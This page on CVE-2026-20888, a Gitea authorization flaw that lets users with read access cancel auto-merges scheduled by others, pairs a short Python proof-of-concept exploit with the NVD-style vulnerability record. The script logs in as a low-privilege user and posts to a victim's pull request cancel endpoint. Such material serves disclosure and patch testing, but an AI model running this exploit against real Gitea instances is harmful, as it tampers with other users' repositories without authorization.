CVE-2026-20888

import requests # CVE-2026-20888 PoC - Cancel Scheduled Auto-Merge # Target: Gitea instance with scheduled auto-merge feature # Author: 88ee5874-cf24-4952-aea0-31affedb7ff2 TARGET_URL = "http://target-gitea-instance.com" USERNAME = "attacker" PASSWORD = "password" TARGET_OWNER = "victim" TARGET_REPO = "vulnerable-repo" TARGET_PR_NUMBER = 123 # PR with scheduled auto-merge by another user def cancel_auto_merge(): # Authenticate as low-privilege user session = requests.Session() login_url = f"{TARGET_URL}/user/login" session.post(login_url, data={ "user_name": USERNAME, "password": PASSWORD }) # Cancel scheduled auto-merge for victim's PR cancel_url = f"{TARGET_URL}/{TARGET_OWNER}/{TARGET_REPO}/pulls/{TARGET_PR_NUMBER}/cancel-auto-merge" response = session.post(cancel_url) if response.status_code == 200: print("[+] Successfully canceled auto-merge without proper authorization!") return True else: print("[-] Failed to cancel auto-merge") return False if __name__ == "__main__": cancel_auto_merge()

{"cve": {"id": "CVE-2026-20888", "sourceIdentifier": "88ee5874-cf24-4952-aea0-31affedb7ff2", "published": "2026-01-22T22:16:17.890", "lastModified": "2026-01-29T22:00:58.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface. A user with read access to pull requests may be able to cancel auto-merges scheduled by other users."}, {"lang": "es", "value": "Gitea no verifica correctamente la autorización al cancelar fusiones automáticas programadas a través de la interfaz web. Un usuario con acceso de lectura a las solicitudes de extracción podría cancelar fusiones automáticas programadas por otros usuarios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.25.4", "matchCriteriaId": "DFCB7D74-331D-4582-AB41-113A25BE8FAA"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.25.4/", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/36341", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/pull/36356", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.25.4", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-ccq9-c5hv-cf64", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Broken Link"]}]}}